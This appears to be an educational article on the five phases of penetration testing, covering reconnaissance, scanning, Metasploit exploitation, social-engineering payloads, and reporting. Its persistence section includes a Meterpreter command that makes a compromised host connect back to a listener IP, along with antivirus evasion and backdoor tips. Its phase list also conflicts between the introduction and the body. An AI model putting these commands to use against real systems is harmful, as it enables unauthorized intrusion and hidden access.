Penetration test experts operate like malicious hackers but protect systems instead of harming them. These authorized security assessments help find vulnerabilities before actual attackers can exploit them. The process involves five distinct phases: reconnaissance, scanning, vulnerability assessment, exploitation, and reporting.
Organizations that follow this systematic approach can substantially improve their security and save money by reducing their attack exposure. Let’s examine each stage of the penetration testing methodology. Many experts call the intelligence gathering phase a vital part of any assessment. The process concludes with a reporting stage that outlines specific recommendations. A deep understanding of these 5 phases shows how ethical hackers work. It reveals the patience, tools, and skills needed to identify system vulnerabilities effectively.
Phase 1: Reconnaissance – Gathering Target Intelligence
A successful penetration test starts with reconnaissance. Ethical hackers spend this phase collecting vital information about their target’s technical setup, weak points, and possible ways to break in. Top security experts spend 70-80% of their time gathering intelligence. They know that good preparation relates directly to how well the assessment goes.
Passive Reconnaissance using WHOIS, Google Dorking, and Shodan
Security testers gather information without touching target systems during passive reconnaissance. This smart approach lets them build a complete picture of their target organization without setting off any alarms.
WHOIS lookups are one of the most simple passive reconnaissance methods. These searches give you key details about who owns a domain, its registration, and IP addresses. To name just one example, see what happens with gentoo.org – a WHOIS lookup shows its IP range (89.16.167.128 – 89.16.167.143) and hosting details. These findings are the foundations of deeper investigation.
Google Dorking gives you another powerful way to gather information quietly. This method makes use of advanced search tricks to find information you can’t get through normal searches. Google Dorks help you track down:
- Usernames and passwords
- Email lists
- Sensitive documents
- Personal, transactional, or financial information
- Website, server, or plugin vulnerabilities
On top of that, Shodan works as a special search engine for devices connected to the internet. Unlike Google or Bing that look at websites, Shodan finds devices like servers, routers, webcams, and industrial systems. You get valuable details about IP addresses, ports, running services, and possible security holes without touching the systems directly.
OSINT (Open Source Intelligence) sits at the heart of passive reconnaissance. You’ll find this information in public sources like websites, social media, and databases. This knowledge helps you understand your target’s digital presence, staff, tech stack, and potential weak spots.
Active Reconnaissance with Nmap and Maltego
Active reconnaissance means directly interacting with target systems. This approach gives you more detailed and accurate data, but you might get caught more easily.
Nmap (Network Mapper) stands out as a key tool for active reconnaissance. This flexible port scanner finds open ports, services, and operating systems on networks. The Nmap Scripting Engine (NSE) makes it even more powerful. You can run special scripts for:
- Network discovery
- More sophisticated OS version detection
- Vulnerability detection
- Backdoor detection
- Vulnerability exploitation
A basic Nmap scan might show that your target has port 80 (HTTP) and port 22 (SSH) open. These could be entry points for further testing.
Maltego shows you reconnaissance data in pictures by mapping connections in complex data sets. The tool excels at showing links between:
- People and their social networks
- Email addresses
- Companies and organizations
- Websites and domains
- IP addresses and network infrastructure
Maltego’s “machines” (automated transform sequences) help you gather lots of information quickly. The “Company Stalker” machine finds email addresses linked to a domain, connects them to social media profiles, and looks at related data.
Security testers need to think about several things when choosing between active and passive reconnaissance:
| Factor | Passive Reconnaissance | Active Reconnaissance |
|---|---|---|
| Detection Risk | Low risk, no direct interaction | Higher risk of triggering alerts |
| Data Accuracy | Less precise, depends on public sources | More accurate, real-time information |
| Legal Implications | Fewer concerns, uses public information | More significant concerns without permission |
| Resource Requirements | Less resource-intensive | More time and specialized tools required |
| Best Used For | Initial assessment, maintaining stealth | Detailed vulnerability identification |
Identifying Network Topology and Attack Surface
Network topology and attack surface mapping round out the reconnaissance phase. This crucial step shows how systems connect and where weak spots might be.
Security testers start by finding the target’s IP range with tools like nslookup and whois. Looking at Gentoo Linux shows its IP range is 89.16.167.128/28, hosted by Bytemark with ASN number 35425. More digging reveals this range is part of a bigger block (89.16.160.0/19).
Traceroute shows the path packets take to reach the target. This reveals routers and network bottlenecks. Running traceroute from different places helps find various ways into the target network.
Attack surface mapping finds all possible entry points for attackers. This detailed process looks at:
- All assets (servers, workstations, databases, routers, firewalls)
- External and internal access points
- Running services and software versions
- User accounts and their rights
- Firewall rules and security settings
- Data protection systems
- Authentication strength
- Default credentials or settings
The attack surface map helps focus testing efforts. High-value assets get more attention since breaking into these systems would hurt the organization more.
Understanding network layout and attack surfaces sets up the next phases of testing. Without this key information, testers would work in the dark, unable to focus their efforts or understand how discovered vulnerabilities might affect the organization.
Phase 2: Scanning – Mapping the Attack Surface
A penetration test moves into the scanning stage after gathering intelligence in the reconnaissance phase. Testers actively probe the target’s systems during this stage. The scanning phase builds on passive information gathering and maps the attack surface. It identifies open ports, running services, and potential vulnerabilities. This phase lays the groundwork that makes successful exploitation possible later in the assessment.
Port Scanning with Nmap and Masscan
Port scanning is the life-blood of network security assessment. It lets penetration testers find services they might exploit. This technique probes a target’s network infrastructure step by step to find open ports that could serve as entry points for attacks.
Nmap (Network Mapper) stands out as the most versatile and popular port scanning tool. Its success comes from over 20 years of development. The tool can perform many scanning techniques through a single interface. Nmap excels at finding hosts, services, and security gaps in networks of all sizes.
Different port scanning techniques work better in specific testing scenarios:
| Scanning Technique | Description | Best Used For |
|---|---|---|
| TCP SYN Scan | Sends SYN packets without completing connections (half-open) | Default scan; fast and stealthy reconnaissance |
| TCP Connect | Completes full TCP connections with target ports | When raw packet privileges aren’t available |
| UDP Scan | Probes UDP services (DNS, SNMP, DHCP) | Finding often-overlooked UDP services |
| TCP NULL/FIN/Xmas | Exploits TCP RFC loopholes to identify open/closed ports | Evading certain firewall detection mechanisms |
| TCP ACK Scan | Determines firewall rulesets and filtered ports | Mapping firewall configurations |
The basic Nmap syntax (nmap [target]) checks the top 1,000 common ports using TCP SYN packets. Experienced pentesters usually customize their scans. They use options like -sV to detect service versions or -p- to check all 65,535 ports.
Masscan takes a different approach. Users value it for its amazing speed. Nmap focuses on accuracy and detailed information. Masscan, on the other hand, can scan huge networks faster. It can even scan the entire Internet in minutes using asynchronous transmission. This makes it valuable for large-scale pentests with many IP ranges.
Service Enumeration and OS Fingerprinting
Pentesters need to identify services running behind open ports and determine target machines’ operating systems. This process helps provide context for vulnerability assessment.
Service enumeration finds specific applications, versions, and configurations on discovered ports. To name just one example, port 80 usually means there’s a web server. Learning whether it’s Apache, Nginx, or something else – along with its version – helps narrow down possible exploit vectors.
Nmap’s service detection (-sV flag) checks open ports and gathers detailed service information like:
- Service name and version
- Protocol information
- Application details
- Configuration insights
OS fingerprinting uses two main approaches:
Active fingerprinting talks directly to target systems. It sends specially crafted packets and analyzes responses. Operating systems handle TCP/IP stacks differently, which creates unique signatures. Nmap’s OS detection (-O flag) matches these responses with known OS signatures. The --osscan-guess option makes Nmap more aggressive in its guesses for unclear results.
Passive fingerprinting takes a quieter path. It looks at existing network traffic instead of creating new packets. Tools like p0f, NetworkMiner, and Satori look at traffic patterns to identify operating systems without triggering IDS alerts. This method offers stealth benefits but might be less accurate than active methods.
Banner grabbing is another useful enumeration technique. Email and web servers often respond to Telnet connections with software names and versions. This gives pentesters valuable fingerprinting data without needing complex tools.
Vulnerability Scanning with Nessus and OpenVAS
Vulnerability scanners help find known security weaknesses after identifying ports, services, and operating systems. These tools check systems against huge vulnerability databases. They create detailed reports that help decide which exploits to try first.
OpenVAS (Open Vulnerability Assessment System) offers a complete open-source vulnerability scanning solution. It uses a client-server setup with two main parts: the OpenVAS Scanner does the actual scanning while the OpenVAS Manager arranges scans, schedules them, collects results, and creates reports.
The OpenVAS Manager talks to the Scanner to run scans based on settings. The scanner then checks target systems or networks. It looks for potential vulnerabilities through active testing of known security issues. The tool uses network scanning, service enumeration, and vulnerability checks to assess security thoroughly.
Nessus, made by Tenable, works in a similar way with its client-server setup. Users set up scans through the client interface. They pick targets, parameters, and scan types. Nessus uses network scanning, port scanning, service enumeration, and vulnerability checks. It relies on plugins that contain checks for thousands of known vulnerabilities.
Both scanners can run authenticated and unauthenticated tests. Unauthenticated scanning finds perimeter weaknesses like badly configured firewalls or faulty web servers that anyone can access. Authenticated scanning needs direct network access through RDP, VPN, VNC, or SSH. This allows deeper assessment by acting like attackers trying to exploit vulnerabilities on endpoint systems and internal servers.
OpenVAS has several benefits:
- Open-source and free to use
- Multiple user accounts with different permission levels
- Support for authenticated scans using SSH, SMB, and ESXi credentials
Nessus shines in other areas:
- More platform support across Windows, Mac, and Linux
- More customization options for scans
- Better coverage of critical vulnerabilities, with 258 more critical vulnerabilities than OpenVAS
- Special scan policies for compliance audits and cloud infrastructure
The scanners create detailed reports with vulnerability descriptions, technical information, and fixes. They include severity scores and CVSS ratings that help rank findings by risk level. These reports give pentesters useful targets for exploitation and clear paths to fix found vulnerabilities.
Phase 3: Exploitation – Gaining Unauthorized Access
The exploitation phase takes penetration testing beyond passive information gathering. Security professionals use intelligence from reconnaissance and scanning to attempt unauthorized access to target systems by exploiting identified vulnerabilities.
Using Metasploit for CVE-based Exploits
Metasploit Framework leads the industry as the go-to platform for vulnerability exploitation during security assessments. This robust tool offers a universal interface that works with exploit code across web servers, operating systems, and network equipment. The latest version 6.0 includes code for 2,147 exploits and 592 payloads.
An exploit program targets specific vulnerabilities to give attackers system access. Most exploits work only with specific versions – the ms14_012_textrange exploit targets Internet Explorer 9 builds from July 2013 to February 2014.
To manually execute an exploit in Metasploit:
- Search for the appropriate module using operators like platform, type, or CVE ID
msf-pro > search platform:Windows msf-pro > search type:exploit msf-pro > search name:ms08-067 - Load the exploit using the
usecommandmsf-pro > use exploit/windows/smb/ms08_067_netapi - Configure required options with the
setcommandmsf-pro exploit(ms08_067_netapi) > set RHOST 192.168.55.1 - Verify target compatibility with
show targetsandcheck - Launch the exploit using the
exploitorruncommand
The BlueKeep vulnerability (CVE-2019-0708) shows how Metasploit handles real-life exploits. The original exploit module targeted 64-bit versions of Windows 7 and Windows 2008 R2. The target system crashes with a bluescreen if someone interrupts the module during exploitation or specifies incorrect targets. This shows why careful preparation matters.
Privilege Escalation Techniques on Linux and Windows
After gaining access, testers usually start with limited permissions. They must escalate privileges to access sensitive data or run privileged commands.
On Linux systems, privilege escalation often uses:
| Technique | Description | Example |
|---|---|---|
| Kernel Exploits | Leveraging bugs in older kernel versions | Dirty COW (CVE-2016-5195) allowed unprivileged users to write to read-only files |
| SUID Binary Exploitation | Abusing executables with “Set owner User ID” permissions | Executing SUID binaries to gain root user shell |
| PATH Variable Manipulation | Adding malicious scripts to PATH directories | Creating scripts that execute when privileged users run commands |
| Sudo Rights Abuse | Exploiting misconfigured sudo permissions | Running commands with elevated privileges to access restricted files |
Windows environments typically involve two types of privilege escalation:
- Vertical privilege escalation (privilege elevation): Increasing permissions with the same account, like adding a compromised account to the local administrator group
- Horizontal privilege escalation: Getting access to another credential with higher privileges
Windows system attackers often target these privileged accounts:
- Domain Admin Accounts (the “King of Accounts”)
- Domain Service Accounts
- Local Administrator Accounts
- Emergency Accounts
- Service Accounts
- Application Accounts
- Privileged Data User Accounts
A recent case shows how simple peripherals can enable privilege escalation. Users could get Windows 10 Administrator privileges just by plugging in a Razer Mouse, thanks to a software vulnerability.
Payload Delivery via Social Engineering Toolkit (SET)
The Social Engineering Toolkit (SET) helps deliver malicious payloads through human-focused attack vectors. TrustedSec founder Dave Kennedy created this open-source tool that security professionals use to run common social engineering attacks.
SET’s “Social-Engineering Attacks” menu includes:
- Spear-Phishing Attack Vectors
- Website Attack Vectors
- Infectious Media Generator
- Create a Payload and Listener
- Mass Mailer Attack
- Arduino-Based Attack Vector
- SMS Spoofing Attack Vector
- Wireless Access Point Attack Vector
- QRCode Generator Attack Vector
- Powershell Attack Vectors
- Third-Party Modules
Two techniques stand out as especially useful:
Website Attack Vectors lets practitioners set up:
- Tabnabbing: Capturing a user’s browser tab to redirect it
- Credential harvesting: Creating bogus websites to capture login information
- Other web-based techniques
The credential harvester method works by using a template that asks for “Java Required.” Testers then pick the backdoored executable shikata_ga_nai to avoid antivirus detection and establish a meterpreter shell on the victim’s system.
Create a Payload and Listener makes it easy to generate malicious payload files while setting up their connection listener. This needs physical access to plant the executable, but other modules can deliver it more effectively.
SET asks testers to choose a payload for the victim during social engineering attacks. It uses Metasploit’s meterpreter extension to create a shell and control the remote system. Custom templates help bypass spam filters and improve attack success rates.
Testers must document all exploitation attempts thoroughly. This documentation helps during the reporting phase by showing how vulnerabilities affect real systems and supports recommended security improvements.
Phase 4: Maintaining Access – Persistence Mechanisms
Access maintenance is a vital stage in the penetration testing lifecycle that happens right after system compromise. Ethical hackers set up persistent mechanisms at this point to keep their access even if the original vulnerability gets patched or the system restarts. This stage shows how real attackers might dig themselves deep into compromised systems.
Installing Backdoors and Rootkits
Backdoors serve as convenient entry points into breached systems and work at the application level. Most backdoors in Windows environments install as services with administrative access. This lets penetration testers extract passwords, credentials, and other sensitive system information. Unlike regular exploits that patches can fix, backdoors give reliable ongoing system access.
Backdoors come with built-in upload/download features that help testers collect important files. They use common ports to hide their traffic:
- Port 53 (DNS)
- Port 80 (HTTP)
- Port 443 (HTTPS)
These communication channels blend with normal network traffic to hide any suspicious activity.
Rootkits are more sophisticated tools that excel at hiding from security measures. They can work at different system levels and manipulate system calls. This helps them hide files, processes, and network connections while providing backdoor access.
Rootkits usually get their first access through Trojan horses. They start with basic user privileges and then escalate to get administrator-level access. These tools are great at keeping long-term access. Rather than causing immediate damage like regular malware, they stay quiet and work in the background.
The system level where rootkits operate affects what they can do and how hard they are to find:
| Rootkit Type | System Level | Capabilities | Detection Difficulty |
|---|---|---|---|
| User-level | Application space | Subvert security software using low-priority processes | Moderate |
| Kernel-level | Core OS components | Can camouflage presence, run before OS, circumvent encryption | High |
| Boot-level | Master boot record/UEFI | Load before operating system initiates | Very High |
Kernel-level rootkits create special challenges because they can change the operating system’s kernel directly. They create hidden access channels and often leave no traces. Removing advanced rootkits is tough and sometimes requires a complete system reinstall.
Using Meterpreter for Session Persistence
Penetration testers often use Metasploit’s Meterpreter to keep access after exploiting a system. The Meterpreter persistence script creates services that stay active after system reboots. This ensures testers keep their access throughout the assessment.
Testers use the run persistence command with several options to set up Meterpreter persistence:
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value
The main configuration options include:
-U: Automatically start the agent when a user logs on-S: Start the agent on boot as a service (with SYSTEM privileges)-X: Start the agent when the system boots-i: Interval in seconds between connection attempts-p: Port on which the attacking system listens-r: IP address of the system listening for connections
Here’s an example that sets up persistence to connect every 5 seconds when a user logs in:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
This creates a persistent VBS script in C:\WINDOWS\TEMP and sets up an autorun service in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The penetration tester gets access back when a user logs in, even after system reboots.
Testers must record and run cleanup commands when the assessment ends. Leaving persistence mechanisms behind creates security risks since these backdoors usually lack authentication controls.
Avoiding Detection with Obfuscation Techniques
Staying hidden from security tools and monitoring systems is key to successful persistence. Obfuscation techniques help penetration testers check detection capabilities by making malicious activities harder to spot.
Code obfuscation makes code harder to read while keeping it working. Complex code creates barriers against reverse engineering. Software developers use this to protect their intellectual property, while attackers use it to hide malicious code.
Several techniques work together to maximize protection:
- Encrypting portions of code
- Using perplexing variable names
- Restructuring program logic
- Implementing polymorphic code that changes with each iteration
Traffic obfuscation helps hide network communications between compromised systems and command-and-control servers. Popular methods include:
- Encoding or encrypting data using protocols like SSL/TLS
- Protocol manipulation to make malicious traffic appear legitimate
- Tunneling malicious traffic within trusted protocols (HTTP, HTTPS, DNS)
- Traffic shaping to mimic normal user behavior
DNS tunneling software can hide data inside DNS requests. This bypasses firewalls that allow DNS traffic. Penetration testers can show how attackers might steal data from environments with strict outbound filtering.
The best penetration testers document their persistence mechanisms well and remove them after testing. This documentation shows the risk of long-term compromise and ensures no unauthorized access remains after the job ends.
Phase 5: Reporting – Documenting the Penetration Testing Process
The last step in penetration testing involves documenting all findings, what they mean, and what needs to be done about them. These documents turn the vulnerabilities we find into real security improvements. They serve as concrete deliverables that stakeholders can use to make their security stronger.
Structuring a Technical and Executive Summary
A good penetration test report has two main parts that work together: an executive summary for leadership and detailed technical findings for the implementation teams. Leaders need a high-level overview of critical findings and business effects without getting into technical details. The summary should be brief – just one or two pages – so people don’t miss the key points.
The technical section needs to spell out the methods, tools used, and exact steps taken during exploitation. Security teams should be able to recreate any vulnerability based on this documentation. Technical findings need to strike a balance – they should be detailed enough but still easy to understand for the teams fixing these issues.
This split approach makes sense. Decision-makers need business-focused information to assign resources properly, while technical staff need specific details to fix the problems.
Including CVSS Scores and Business Impact
The Common Vulnerability Scoring System (CVSS) helps everyone speak the same language about how serious vulnerabilities are. Scores range from 0 to 10, with higher numbers showing bigger risks. This system has several benefits:
- Creates a standard base for risk assessment
- Helps organizations prioritize vulnerabilities the same way
- Gives numbers that show how technically severe issues are
In spite of that, CVSS scores tell only part of the story. Good reports combine technical severity with business effects to show how vulnerabilities fit into an organization’s specific environment. This approach looks at:
- How critical the affected systems are
- What kind of data they handle
- How easy it is to reach vulnerable systems
- What privileges someone needs to exploit them
Many companies create their own risk ratings based on what they need. These ratings help them set fix-by dates and decide which problems need to be escalated to regulators or board members. This mix of technical scores and business context helps companies fix the most important problems first.
Providing Remediation Steps and Strategic Recommendations
A complete report must tell you how to fix each vulnerability, not just point them out. Each issue should come with specific fix steps, ranked by risk level and severity. These recommendations should be practical and tackle the worst problems first.
Reports often suggest bigger-picture improvements beyond just fixing specific issues. These might include:
- Security checks every year
- Training programs for developers
- Better ways to develop secure code
- Changes that fix root problems instead of just symptoms
Reports should track when issues get fixed and show retest results, marking vulnerabilities as “closed” once they’re fixed. The original findings should stay in the report even after fixes, giving a full picture of the assessment.
Companies that need to follow regulations often want sections that map findings to standards like PCI-DSS or GDPR. This helps show they’re working on compliance while making their security better.
A well-made report does many things at once: it documents problems, shows how to fix them, proves compliance, and tracks security improvements over time. This documentation wraps up the whole penetration testing process – from finding issues to fixing them – and shows how an organization’s security has gotten better.
Conclusion
The five phases of a penetration test give organizations a full picture of their security vulnerabilities and how to fix them before attackers can exploit them. Ethical hackers mirror criminal tactics to protect systems. They start with reconnaissance to gather intelligence. Next comes scanning to map potential entry points. The exploitation phase shows how vulnerabilities affect systems in real life. Attackers then demonstrate how they keep long-term access. A detailed report turns technical findings into security fixes.
Each phase has its own purpose but works together as part of an integrated security check. The best penetration tests cover all five phases instead of focusing on just a few areas. The information gathered in early phases helps make later stages more effective. This creates a cycle where findings shape the testing approach.
Penetration tests do more than just find vulnerabilities. They provide solid proof of security gaps and help prioritize fixes based on risk. Organizations can track their security progress over time and adapt to new threats. Regular testing creates security benchmarks that show improvement.
Organizations that make penetration testing part of their security program gain clear advantages. They find and fix vulnerabilities before attackers discover them. Teams develop practical defense strategies based on real-life attack scenarios. The detailed reports help build security awareness across technical and leadership teams. These tests also prove compliance with regulations.
Penetration testing goes beyond technical checks – it shows a proactive approach to security. Clear scope, methods, and reporting make these assessments powerful tools to improve security against sophisticated cyber threats. Testing might feel uncomfortable, but thinking like a hacker while staying ethical creates stronger systems and better-protected data.
Key Takeaways
Understanding the five phases of penetration testing reveals how ethical hackers systematically identify and exploit vulnerabilities to strengthen organizational security before malicious actors can cause harm.
• Reconnaissance is critical: Spend 70-80% of testing time gathering intelligence through passive and active techniques like WHOIS, Google Dorking, and Nmap scanning.
• Systematic scanning maps attack surfaces: Use tools like Nmap, Masscan, and vulnerability scanners (Nessus/OpenVAS) to identify open ports, services, and exploitable weaknesses.
• Exploitation demonstrates real impact: Leverage frameworks like Metasploit and Social Engineering Toolkit to prove vulnerabilities can be weaponized by actual attackers.
• Persistence testing reveals long-term risks: Install backdoors and rootkits to show how attackers maintain access even after system reboots or patches.
• Comprehensive reporting drives action: Structure findings with both executive summaries and technical details, including CVSS scores and specific remediation steps for maximum organizational impact.
The penetration testing methodology transforms from passive intelligence gathering to active system compromise, ultimately providing organizations with concrete evidence of security gaps and actionable strategies to strengthen their defenses against evolving cyber threats.
FAQs
A penetration test typically consists of five key phases: reconnaissance, scanning, vulnerability assessment, exploitation, and reporting. Each phase builds on the previous one to systematically identify and exploit vulnerabilities in a target system.
Reconnaissance involves gathering intelligence about the target, often through passive means like OSINT. Scanning is more active, using tools like Nmap to probe the target’s network and identify open ports, services, and potential vulnerabilities.
Popular tools for the exploitation phase include Metasploit for executing known exploits, the Social Engineering Toolkit (SET) for crafting social engineering attacks, and custom scripts for exploiting discovered vulnerabilities. The specific tools used depend on the target and identified weaknesses.
Maintaining access demonstrates how attackers could establish long-term persistence in a compromised system. This phase involves techniques like installing backdoors or rootkits to show how attackers might retain control even after initial vulnerabilities are patched.
A thorough penetration test report should include an executive summary for leadership, detailed technical findings, CVSS scores to quantify vulnerability severity, business impact analysis, and specific remediation steps. It should provide actionable insights for both technical teams and decision-makers.
